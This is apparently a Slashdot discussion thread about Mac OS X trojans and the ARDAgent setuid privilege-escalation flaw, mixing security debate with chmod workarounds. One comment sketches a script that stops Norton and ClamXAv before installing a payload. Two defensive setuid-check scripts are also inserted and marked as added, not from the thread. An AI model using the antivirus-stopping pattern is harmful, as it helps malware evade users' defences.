      The sad thing is that there are enough casual users who are running Apples that aren't running security software at all. Every time I've gone into an Apple store, I've overheard Apple salespeople telling customers who ask about getting anti-virus software that "Apples don't get viruses." Heck, the implication that Apples are immune to viruses has made it into the Switch ads. Stuff like this leads to a culture of complacency among casual Apple users, that makes the likelihood of a major virus outbreak more likely.

      --
      Zagreus sits inside your head, Zagreus lives among the dead, Zagreus sees you in your bed and eats you in your sleep.
    8. Re:"Politely request your password"... Meh by jamrock · · Score: 1

      Well done, and I'm sorry you can't get more than a score of 5 for your post. That's a beautifully concise summary of the differences among trojan, virus, and worm, as well as pinning the responsibility for most malware infections where it truly belongs, on ignorant or foolish users. Kudos.

  19. Aren't you forgetting something? by Undead+NDR · · Score: 1

    chmod +x coolGame.sh

  20. well... by W33B · · Score: 0

    I work in a design studio with 8 Mac users (I'm the only PC user...sob) and the common thought here is that Macs just don't do anything bad....ever!

    Even when their profiles get corrupted and they have to wipe their machines they tend to see it as a normal mac thing that has to be done every now and again...and happily carry on regardless.

    The problem with these types of mac users is that they completely trust everything the os is telling them because what reason do they have to doubt it..?

    With this mentality (which I'm sure is not isolated to my office) the trojan politely asking for a password will be successful 99% of the time.

    just my 2 cents

    1. Re:well... by falcon5768 · · Score: 1

      why would you reinstall for a corrupted profile? I have gotten one maybe twice and both times was easily repaired. Why would your IT dept even ALLOW that?

      --
      "Slashdot, where telling the truth is overrated but lying is insightful."

    2. Re:well... by W33B · · Score: 0

      as stated...I work in a design studio with 8 others, we have no such thing as an IT dept.

      I myself also thought this was ridiculous but not being a mac user (or having any interest in becoming one) I just leave them to it and keep my mouth shut!

      design studio = designers <> slashdot readers

    3. Re:well... by falcon5768 · · Score: 1

      I still find it strange though, since mac designers I know (and I do know a few having come from a newspaper) are usually very smart about their macs specifically because if they go to a big house there tends to be a push and pull match between them and their IT department. Are they older designers? Cause I could understand if they are holding on to the old OS 9 mentality where you DID reinstall everything (and crossed your fingers to boot) but all that went out the window 10 years ago.

      --
      "Slashdot, where telling the truth is overrated but lying is insightful."

  21. OS X has no functional root by Anonymous Coward · · Score: 0

    Root on OS X is off by default out-of-the-box, isn't it?

    1. Re:OS X has no functional root by ktappe · · Score: 3, Informative

      Root on OS X is off by default out-of-the-box, isn't it?

      Yes, it is off by default.

      --
      "We can categorically state we have not released man-eating badgers into the area." - UK military spokesman, July 2007
    2. Re:OS X has no functional root by Anonymous Coward · · Score: 0

      Root on OS X is off by default out-of-the-box, isn't it?

      Yes, it is off by default.

      NO it isn't. You simply can't log in as root. However, these exploits will work fine executing as root.

  22. Smaller-market-share-as-security myth by Immerial · · Score: 1

    I think the whole smaller market share as security is a myth... at least as a main reason, IMHO. I'm sure it has some effect but nothing as big as people say. Currently there are at least ~26 million Macs out there (being very conservative), which is still a lot of machines. Heck, even Mac OS 9 had more viruses and Macs had a much smaller market share. I'm sure somebody would have done something by now if it was easy.

  23. Lies by Anonymous Coward · · Score: 0

    Everyone knows that there are no such things as malware/trojans/viruses on Macs and can never, ever be any. Blessed Saint Steve (PBHN) has declared it to be so. "It just works."

    1. Re:Lies by stewbacca · · Score: 1

      Thanks for contributing.

  24. The suggested fix for ARDAgent... by mario_grgic · · Score: 1

    A lot of websites are now suggesting changing the permissions on the ARDAgent to remove the SUID bit on it.

    This works until you repair the permissions (using Disk Utility, which consults its database of permissions), which puts it right back, making you vulnerable again.

    --
    As the island of our knowledge grows, so does the shore of our ignorance.
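    A defender's check for the state described in this post, added here as an example and not code from the thread: it reports whether a given file carries the setuid bit, so an admin can re-verify the permissions after a "repair permissions" run has silently restored them. The path in ARDAGENT_DEFAULT is an assumption (the binary's usual location on Mac OS X of that era) and should be verified locally; the demonstration files are constructed in a temporary directory.

    ```shell
    # Added example, not code from the thread. Reports whether a file carries the
    # setuid bit, so the ARDAgent permissions can be re-checked after Disk
    # Utility's "repair permissions" has run. ARDAGENT_DEFAULT is the assumed
    # location of the binary on Mac OS X of that era; verify it on your system.
    ARDAGENT_DEFAULT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

    # setuid_state PATH
    #   prints "setuid", "no-setuid" or "missing" and returns 0, 1 or 2
    setuid_state() {
        f="$1"
        if [ ! -e "$f" ]; then
            printf '%s\n' "missing"
            return 2
        fi
        # POSIX test: -u is true when the setuid bit is set
        if [ -u "$f" ]; then
            printf '%s\n' "setuid"
            return 0
        fi
        printf '%s\n' "no-setuid"
        return 1
    }

    # check_path PATH
    #   one-line human-readable report; safe to call from a set -e script
    check_path() {
        state=$(setuid_state "$1" || true)
        printf '%s: %s\n' "$1" "$state"
    }

    # Self-contained demonstration on constructed files: one with the bit set,
    # one without, and one that does not exist, then the assumed ARDAgent path.
    demo() {
        d=$(mktemp -d)
        : > "$d/with_suid"
        : > "$d/without_suid"
        chmod 4755 "$d/with_suid"
        chmod 0755 "$d/without_suid"
        check_path "$d/with_suid"
        check_path "$d/without_suid"
        check_path "$d/does_not_exist"
        check_path "$ARDAGENT_DEFAULT"
        rm -rf "$d"
    }

    demo
    ```

    Running `check_path` on the real path from cron or a login script gives a cheap way to notice when the bit has come back, which is the failure mode the post describes.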
    1. Re:The suggested fix for ARDAgent... by guruevi · · Score: 1

      The problem is, some of us require ARDAgent to work as it is supposed to. I am using Apple Remote Desktop to manage workstations and it does a darn good job. I can send root commands like softwareupdate -i -a to all agents and they do their work and report back to me.

      Apple needs to fix this although I think the problem would only exhibit itself when somebody has gained access to the local network. As for the other one, that is not a trojan, just a script and a virus scanner wouldn't help either since I could write the following script:

      if [ -f "/Library/StartupItems/NortonAutoProtect" ]; then /Library/StartupItems/NortonAutoProtect/NortonAutoProtect stop
      fi
      if [ -f "/Library/StartupItems/ClamXAv" ]; then /Library/StartupItems/ClamXAv/ClamXAv stop
      fi
      etc. etc.
      then install something nasty

      --
      Custom electronics and digital signage for your business: www.evcircuits.com
  25. OSX VIRUS MAKERS. Do Better! by Flaystus · · Score: 1

    Really you guys are just letting us down time and time again. We need a GOOD exploit if we are ever to bridge the software divide between the two platforms! OSX Virus makers, please step up your game.

  26. 3rd Virus Spotted. This one in the wild! by Anonymous Coward · · Score: 0

    All a user must do to be infected is connect through the internet...via a Linksmart GR90S v2.5465b router, then visit google.com then go to your local CompUSA and purchase a copy of Diablo 3 and install it. Register the key code for Diablo 3 then go to the local brick yard. Buy exactly 2 bricks, then go home. Smash their machine with the brick then go out to the tattoo shop and have your SSN, Login, and Password for your bank tattooed on your forehead.

  27. No, non-password variants won't appear by ktappe · · Score: 3, Insightful

    we can expect that future trojans won't just politely request your password.

    Um....except that they won't have any choice. If they want to modify the filesystem, OS X won't let them unless they've obtained authority and that requires them doing so via the authentication system that asks for the user's password. The above fact IS the OS X security system doing its job. If a user chooses to subvert the system by entering their password whenever requested without asking any questions, then how is that OS X's fault? Do you hand your housekey to any random guy who walks up on the street? Then don't give your password to random software. I could tell before I even checked that this "story" was approved by kdawson.

    --
    "We can categorically state we have not released man-eating badgers into the area." - UK military spokesman, July 2007
    1. Re:No, non-password variants won't appear by 99BottlesOfBeerInMyF · · Score: 1

      ...we can expect that future trojans won't just politely request your password. Um....except that they won't have any choice. If they want to modify the filesystem, OS X won't let them unless they've obtained authority and that requires them doing so via the authentication system that asks for the user's password.

      I think you're missing the point. The proof of concept escalated privilege without the password using a hole. The second trojan is in the wild and asks for a password. If the author of the second takes the code from the first, then we'd end up with just that. Maybe that will happen and maybe it won't, but it can happen.

  28. Harumph. If you were a teacher.... by supercrisp · · Score: 1

    If you were a teacher, you wouldn't be surprised at the level of moronism among students and faculty. I'm convinced we see as much if not more idiocy than systems folks. Two examples from the last semester:

    Story One: A freshman student this semester copied her whole paper from a graduate-student textbook written by a PhD researcher. Cut and paste. I catch it, tell her she's getting an F. She turns in her next paper, same composition method. Zero, expulsion.

    Story Two: I get my teaching evaluations back from the faculty committee. They say I'm awesome, god's sliced cheese, EXCEPT for two problems: my grading rubric is too confusing and I have no schedule of readings. BUT, my grading rubric was an exact copy of the one on the department website that I was told to use, and my schedule of readings was three of the six pages I submitted for their review.

    Moral: Never be surprised at how idiotic people can be on a university campus. Some days it's almost like an upperclass twit of the year contest.

  29. OMGZ it's teh OS X trojanz! by Yvan256 · · Score: 0, Redundant

    Trojan asks users for password, intelligent users are safe, news at 11.

  30. ARDAgent on Tiger by goombah99 · · Score: 2, Insightful

    I've tried the ARDAgent on dozens of different people's computers now and it only worked on Leopard not on Tiger.

    Has anyone seen this work on Tiger? If so what's the configuration where it actually works.

    It also does not work on most Leopard computers as things like Fast User switching, or having remote desktop turned on (yes on) cause it to fail.

    Now as for trojans. Well what can you say. All computers are vulnerable to trojans. The poker game would run on linux too.

    In the case of the poker game download the Mac is going to ask you three times:

    1) The item being downloaded contains an application, are you sure?

    2) The application being launched for the first time was downloaded from the internet, are you sure?

    3) then finally when it asks for your password.

    And at best it runs at user level without the ARDAgent escalation.

    --
    Some drink at the fountain of knowledge. Others just gargle.
    1. Re:ARDAgent on Tiger by Sancho · · Score: 2, Insightful

      Has anyone seen this work on Tiger? If so what's the configuration where it actually works.

      My wife's notebook runs Tiger, and the exploit worked there. The same set of configurations for which it works on Leopard seem to work on Tiger, too:

      User must be logged into the desktop environment (not just logged in through SSH). You must not have used Fast User Switching to log in. ARDAgent must not be running.

      All computers are vulnerable to trojans. The poker game would run on linux too.

      Yup. Of course, the main reason that Mac-using Slashdotters point to for why OS X is more secure than Windows is that you aren't running as administrator. Seriously, go look at any OS X/Apple/Mac story, and it always comes up (and frequently) within the comments. Everyone ignores the fact that 99% of what a trojan would want to do can be accomplished without the password, and exploits like this get it that remaining 1%.
    2. Re:ARDAgent on Tiger by konohitowa · · Score: 2, Informative

      It doesn't work on my Tiger install either having followed all of the same config caveats.

      And at best it runs at user level without the ARDAgent escalation.

      Not true. Since the admin group has sudo privileges by default in OSX, simply having the password of someone who is allowed to admin the computer gives you the ability to run as root.

      In Linux you have to go out of your way to add users to the /etc/sudoers file.

    3. Re:ARDAgent on Tiger by Anonymous Coward · · Score: 0

      only retards run as admin on a mac

    4. Re:ARDAgent on Tiger by goombah99 · · Score: 1

      Has anyone seen this work on Tiger? If so what's the configuration where it actually works.

      My wife's notebook runs Tiger, and the exploit worked there. The same set of configurations for which it works on Leopard seem to work on Tiger, too:

      User must be logged into the desktop environment (not just logged in through SSH). You must not have used Fast User Switching to log in. ARDAgent must not be running.

      Empirically I can tell you that is not sufficient. Not a single Tiger I tested was configured that way and it still would not run. I've never seen it run on any Tiger machine.
      --
      Some drink at the fountain of knowledge. Others just gargle.
    5. Re:ARDAgent on Tiger by konohitowa · · Score: 1

      I can see why you posted that as an AC. Your ignorance is still safely hidden.

      You might want to learn a little about Unix, groups, and the permissions structure before you post anything as stupid as that using a slashdot account.

    6. Re:ARDAgent on Tiger by Anonymous Coward · · Score: 0

      I can see why you posted that as an AC. Your ignorance is still safely hidden.

      And I can see why you posted as an Asshat. Your arrogance is in plain sight.

    7. Re:ARDAgent on Tiger by konohitowa · · Score: 1

      So explain to me what steps you need to take to run as "admin" on a mac.

    8. Re:ARDAgent on Tiger by Anonymous Coward · · Score: 0

      So explain to me what steps you need to take to run as "admin" on a mac.

      Like Linux, by default the first user created is an admin. The logic for that is obvious.

      Additional users created on mac and on linux are by default not admin users. This means that 1) they do not have sudo privileges and 2) they do not belong to the wheel or other special group.

      In both linux and mac you can add a user in a way that makes them "admin" users.

      For a non-admin user to act as an admin then from the command line they must first "su" to an admin user and then sudo to execute commands with root privileges. Alternatively on a mac the authentication framework requests the same information but does it through a proxy. This lets the app wanting the privileges execute a command with root privileges but without learning the password. This is more secure.

      Thus on a mac running as a non-admin user but still enjoying the ability to do admin operations is both greatly simplified and more secure since the password is never revealed.

      Of course any application given root permissions, even without knowing the password, can do pretty much the same damage. One can imagine however that eventually this framework will be extended to grant applications more limited privileges, e.g. no setuid privileges or no writing to certain areas, etc. That however is for the future to decide.

    9. Re:ARDAgent on Tiger by konohitowa · · Score: 1

      Well, I almost have to think that you're not the original AC that started this. Either that, or you are and had to google the answer. Or maybe chilled out.

      Anyway, the whole point in that question (since I already knew the answer) was to point out that the initial (and therefore default user) on the Mac is an "admin". If you check the thread, you'll see the AC (you?) said "only retards run as admin on a mac".

      That points to an incredible ignorance of the Mac and Unix permissions. And when I called them on that, an AC (same AC?) called me arrogant. After apparently having called anyone with a standard Mac install account a retard.

      See where we're going with this?

  31. Next Steps for Mac Users. by Anonymous Coward · · Score: 0

    Although some people are STILL in denial about Mac OS security, by now almost all Mac users know that their computers are vulnerable to trojans and malware. After all, within the past year there have been over 60 Slashdot articles on the subject and dozens of very high profile stories in the popular press.

    The scary part is that most Mac OS users think they can't catch malware because they're smart enough not to install it. Nothing could be further from the truth.

    History shows us that even the smartest of users can catch malware. Your best form of protection is the same protection afforded to users of Windows: Symantec's Norton Security products are mature, with Mac versions being available on the Mac platform for literally decades. As a low-cost subscription, every Mac user can walk away with the security and peace of mind offered by Norton.

    1. Re:Next Steps for Mac Users. by pandrijeczko · · Score: 1

      You sound like you work for Norton so can I state here and now that I stopped using both Symantec's and McAfee's products several years ago because they are both bloated pieces of adware that only care about signing you up to a subscription. They are bloated, resource hungry and overly intrusive.

      I now use a range of both free and commercial products that are cheaper, better and just run pretty silently in the background without bothering me every five minutes. I am an experienced computer user but I have fixed at least a dozen friends' and relatives' PCs over the years that came pre-installed with Symantec software that was bugging the hell out of them for more subscription money. Having removed it completely and replaced it with legitimate versions of the products I use, each and every one of them has said their PCs run faster and they are no longer constantly interrupted with update messages.

      Both Symantec & McAfee products serve a purpose for a price - but half the stuff in the "Internet Security Suite" packages are redundant and the other half can be bought cheaper elsewhere without the nagging.

      --
      Gentoo Linux - another day, another USE flag.
  32. Fresh out of the apple tree by electricbern · · Score: 1

    Worms for Apples. Can't you just smell the pun?

    --
    alias possession='chmod 666 satan && ls /dev > il && tail daemon.log'
    1. Re:Fresh out of the apple tree by hyades1 · · Score: 1

      "Smell the pun"??? What an apt expression.

      --
      I've calculated my velocity with such exquisite precision that I have no idea where I am.
  33. What are Mac users doing wrong exactly? by PPCAvenger · · Score: 1

    People keep accusing Mac users (I use a Mac laptop and an XP tower myself) of being lax on security but what exactly does this mean and what exactly are "we" doing wrong?

    I don't run anti-virus on my Mac but I do run it on my PC. In all the years of running it on the PC I've never once had it detect anything and the only thing the malware scanners have ever flagged are cookies and Win MRU files; even when I slacked off and didn't scan for six months or more. Prior to that I used Windows 95/98 for many years without an AV program at all; never had an issue.

    Security (for a home desktop) is not a difficult thing to maintain. I've basically lived by the rules I learned from watching Leo Laporte on "The Net" on C/Net TV back when I dialed up to the Internet using my 14.4 fax/modem and Netscape Navigator 2.0 and RealPlayer were a big deal... Don't open attachments you weren't expecting, don't download files from sites you don't trust, keep your software up-to-date, use a firewall (though that one came a bit later).

    That's pretty much all there is to it folks, not that I have to tell this crowd. If people are opening attachments and downloading executables from anywhere and everywhere then that has nothing to do with platform security or feeling that you are invulnerable; it's just bad practice and those people need to be introduced to the very simple rules and slapped when they fail to follow them.

    On the issue of Mac passwords, I'm very suspicious when any program asks me for a password to do installations because most user land apps on a Mac shouldn't need an installer at all, let alone one that needs escalated privs to install or operate. A keychain prompt is not the common occurrence that the Vista equivalent is said to be. (I haven't had much hands on time with Vista.)

    The big companies are guilty of prompting for passwords often with installers but I trust they won't infect my computer with malware (depending on your views on DRM...) and let them go ahead.

    To summarize this lengthy post, how are Mac users acting less cautiously than anyone else? There's not a whole lot more they could be doing aside from running mostly worthless AV programs.

  34. Tell me your pet's name... by xactuary · · Score: 1

    Guessing passwords isn't that difficult. Tell me your pet's name and I'll tell you your password.

    --
    Say hello to my little sig.
    1. Re:Tell me your pet's name... by Anonymous Coward · · Score: 0

      My pet's name is 'Mouse'. Please respond with my password.

  35. Wait a minute... by rgviza · · Score: 0, Flamebait

    OSX and linux are immune to viruses and don't get malware!!!

    >plant tongue firmly in cheek /end sarcasm

    I hate to say it but I told you so. I cringe every time I see some moron recommending linux or OSX "because they don't get viruses and are immune to malware".

    And no, I'm not a windows user (except at work, Gentoo at home).

    The reason for the "immunity" is that people simply haven't targeted these os's yet. 0day will get here eventually... just give it time.

    -Viz

    --
    Don't kid yourself. It's the size of the regexp AND how you use it that counts.
  36. How Many Articles Out Of ONE Exploit? by macs4all · · Score: 0

    There has been one exploit of the setuid permission in ARDAgent (and its minion, osascript), but THREE /. articles (including this one) that try and make it sound like there's a new exploit every single day in OS X.

    Oh, and of course, neither TFA nor the /. summary points out that the vulnerability is easily rendered ineffective by disabling the setuid bit (sticky bit) in ARDAgent, by typing the following into a Terminal session:

    sudo chmod 550 /System/Library/CoreServices/RemoteManagement/ARDAgent.app

    That will do until Apple addresses this vulnerability, and will NOT affect normal operation of Apple Remote Desktop. Caution: Do not "Repair Permissions" until Apple fixes this "officially", or at least do the "chmod" thing, above, immediately AFTER you Repair Permissions.

    That is all.
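
    As an added example (not the poster's code, and nothing from Apple), here is a small check that reports whether the workaround above is in place, so you can re-run it after a "Repair Permissions" as the comment advises. It uses the .app path named in the comment, and assumes the setuid bit sits on the executable inside the bundle at Contents/MacOS/ARDAgent, which is where a setuid bit takes effect; the function also accepts any other path so it can be exercised on a non-Mac.

```sh
#!/bin/sh
# Added example, not code from the thread: report whether the ARDAgent
# executable still carries the setuid bit that the workaround above removes.
# The .app path is the one named in the comment; a .app bundle is a directory,
# and the setuid bit that matters sits on the executable inside it, whose
# location below (Contents/MacOS/ARDAgent) is an assumption.
ARDAGENT_APP="/System/Library/CoreServices/RemoteManagement/ARDAgent.app"
ARDAGENT_BIN="$ARDAGENT_APP/Contents/MacOS/ARDAgent"

# is_setuid PATH: exit 0 if PATH exists and has the setuid bit (04000), else 1.
# 'find -perm -4000' (leading dash = "all of these bits set") works on both the
# BSD find shipped with OS X and GNU find, unlike 'stat', whose flags differ.
is_setuid() {
    [ -e "$1" ] || return 1
    [ -n "$(find "$1" -prune -perm -4000 2>/dev/null)" ]
}

# check_ardagent [PATH]: print a one-line status for PATH (default: the
# ARDAgent executable). Exit 0 = no setuid bit, 1 = setuid bit present,
# 2 = path not found (e.g. not a Mac, or Remote Management not installed).
check_ardagent() {
    target="${1:-$ARDAGENT_BIN}"
    if [ ! -e "$target" ]; then
        echo "not found: $target"
        return 2
    fi
    if is_setuid "$target"; then
        echo "setuid bit present on $target (workaround NOT applied)"
        return 1
    fi
    echo "no setuid bit on $target (workaround applied)"
    return 0
}

# Run the check only when invoked as 'sh this.sh --check [PATH]', so the
# functions can also be sourced from another script without side effects.
if [ "${1:-}" = "--check" ]; then
    shift
    check_ardagent "$@"
    exit $?
fi
```

    Run it as `sh check_ardagent.sh --check` on the Mac; a non-zero exit status means the bit is back (or the path was not found), which is the signal to re-apply the chmod.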

  37. It's not "immunity", it's "resistance". by argent · · Score: 2, Insightful

    I'm so damn sick of people going "oooh, aaah, I thought $software was immune to $threat" when no credible commentator has made such a claim.

    Just quit it, OK? It just makes you look like an utter twit.

    And it's not just a lack of being targeted. It's a smaller surface area for attack, as well. OS X has nothing comparable to the rich viral petri dish that the tight desktop-browser integration in Windows provides. Before 1997, Windows viruses were virtually all a matter of tricking people into running software, not having software automatically run when you just select an email message so you can delete it... which is how bad things were in the late '90s. Microsoft has tightened up the gaping holes in Windows since then, but they have done NOTHING to remove the underlying flaw that makes these kinds of attacks so easy there.

    Compared to Windows, OS X is "virus resistant". That doesn't mean "virus proof". But it does mean that it's going to remain harder to infect than Windows until such time as Apple decides to implement something as barking mad as ActiveX.

  38. Still nothing to see here. by argent · · Score: 2, Insightful

    These trojans are purely payload. The delivery mechanism is still social engineering... not remote execution. We know that "once you're penetrated you're ****ed", pointing out again the ways you can be ****ed is not news (for nerds or otherwise) nor stuff that matters.

    These are not the viruses you're looking for. Nothing to see here, move along.

  39. The real "Next Step for Mac (& Windows) Users" by argent · · Score: 4, Informative

    History shows us that even the smartest of users can catch malware.

    It's been 17 years since the last time I had to remove a virus from my own computer, even when that computer's been unpatched Windows 2000 connected to the Internet. In the years that I was network and security admin and had control of the network, the only time we had any systems infected was when a user had either downloaded and run a file (that is, they were social-engineered, and in 10 years only one person came to me with an infected laptop after doing that twice) or they had violated my policy banning IE and Outlook at our location.

    The potential for infection if you avoid software that supports automatic execution of remote content is very very small, even on Windows. The reason that Windows has a high infection rate is because of IE and Outlook, not simply because it's popular.

    If you're on a Mac, and use Safari, here's the next steps you should take:

    (1) Go into preferences and make sure "Open 'Safe' Files after Downloading" is disabled.
    (2) Get a standalone FTP client and use one of the third-party LaunchServices editors (look for internet access preference panes) and change the default application for FTP: URLs from Finder to something else.
    (3) Use Tinkertool or equivalent to disable Dashboard.

    #1 is the most important. #2 and #3 don't allow automatic execution of untrusted content, but they do make social engineering easier.

    If you use a Gecko-based browser like Firefox or Camino, you don't need to worry about these.

    If you're on Windows: avoid using any application that uses the Microsoft HTML control to access untrusted content. That includes IE, Outlook (not all versions, any more, but I believe you have to accept the Vista-style UI to avoid it), Windows Media Player, Realplayer, and some Firefox plugins and some versions of Netscape.

    In Firefox, Windows or Mac or Linux, always clean out the whitelist for installing extensions after you install an extension... the installer is an autoexecution mechanism, and there have been exploits that took advantage of that even if you don't approve the install dialog.

    The scary part is that most Mac OS users think they can't catch malware because they're smart enough not to install it.

    At the moment that's not far from the truth. You can avoid catching malware by being smart enough to avoid running it, on Windows or OS X, if you exercise some care in the applications you use, and how they're configured. It's harder on Windows, but it's still possible.

  40. Here is the Workaround patch by Anonymous Coward · · Score: 2, Informative

    http://www.macfixit.com/article.php?story=20080624105604884

  41. Hold on there... by ToasterMonkey · · Score: 1

    Do you have any idea what the impact of ILOVEYOU and Code Red were on corporate Windows systems? Let me assure you, these systems had administrators. All jokes about Windows administrators aside, they're actually more competent than many of you kids think.

    What about SQL Slammer? That was anything but insignificant, and I'm pretty darned sure most SQL servers do in fact have administrators taking care of them. Don't think for a damned second that the average Oracle admin knows a damn thing more about system security than a SQL admin would.

    All I'm trying to say, is a good Linux worm would be the freaking cat's pajamas, and I believe there are more public, Internet facing corporate Linux servers than Windows at the moment, and these are run largely by people who regard rsync as an enterprise backup solution. These are the same people that would rather build and maintain their own iSCSI server than ask the company to plunk down for another FC HBA or two.

    So, please don't just assume every "Linux admin" will have the most secured, locked down configuration in the world, unless they're only managing something like five servers. That really goes for sysadmins of any system, don't assume a Solaris, Windows, Mac, Linux, whatever admin to go over the entire enterprise environment with a fine toothed comb, writing personalized firewall rules for each box.

    Erm... sorry, I must be a little jaded by the goings on at work, and I've lost touch with the Linux world ever since I read a large article on storage in Linux Magazine that filled two pages with iSCSI and Infiniband of all things, with no mention of Fibre Channel. Linux admins are from a different f'ing planet or something.

  42. microsoft by mapleneckblues · · Score: 0, Flamebait

    Waiting for the fanbois to start blaming microsoft.

  43. 2 Exploits? That's all? by Em0ry42 · · Score: 2, Insightful

    I'm sorry... but am I alone in thinking that it's HILarious that everyone gets whipped into a frenzy when _2_ POSSIBLE exploits are discovered in Mac OS, when Windows has over the years shown... thousands if not millions?

    I don't mean to be an anti-windows troll, trust me, I still have 2 Windows machines at home (and then 10 Ubuntu) but assuming that whoever discovered these vulnerabilities spends a large portion of their time looking for them, I'd say the record looks pretty good thus far...

    I personally have concluded that it's not possible to make a COMPLETELY secure OS, (especially given PEBKAC) but if you make one that demonstrates issues on a rare/reasonably rare basis then you've done it well.

    So Hurrah Apple (and contributing OSS Devs), I say job well done!!!

    --
    Sig: Do not judge me on how high UID is, but judge me on the content of my comments.
    1. Re:2 Exploits? That's all? by Anonymous Coward · · Score: 0

      I'm sorry... but am I alone in thinking that it's HILarious that everyone gets whipped into a frenzy when _2_ POSSIBLE exploits are discovered in Mac OS, when Windows has over the years shown... thousands if not millions?

      I would find it hilarious except it hasn't been 2 vulnerabilities, there have been hundreds for apple just in the last year or so, these 2 are just examples of how easy it will be for trojans to take advantage of users with the "latest" vulnerabilities. Feel free to do a google for yourself if you are foolish enough to think there have ONLY been 2 vulnerabilities.
  44. Poll on sodahead by threnodyeve · · Score: 1

    Sucks for Mac Users! I saw a poll about this on Sodahead.. http://www.sodahead.com/question/106949/

  45. yes yes yes, the mac is so insecure that . . . . by kraksmoka · · Score: 1

    there's a whole industry of companies that sprung up just to plug the leaks. any free software on the mac is just commercial crud that's reporting your passwords, preferences, deepest darkest secrets, etc. to a secret dark corporate master who is selling the data, or advertising to you to make money, stealing your bandwidth, processing time, etc.

    oh wait, that's winbloze . . . .

    it is great that there is the scrutiny, but when most of the bugs are social engineering, or physical access hacks, it just confirms what the whole world knows:

    Macs are more secure!

    Oh, and for all of you people with blank passwords, please fill them in . . . . at least use the combination to your luggage. is 123456 that tough to remember or type????

    --
    "You never want a serious crisis to go to waste." - Rahm Emanuel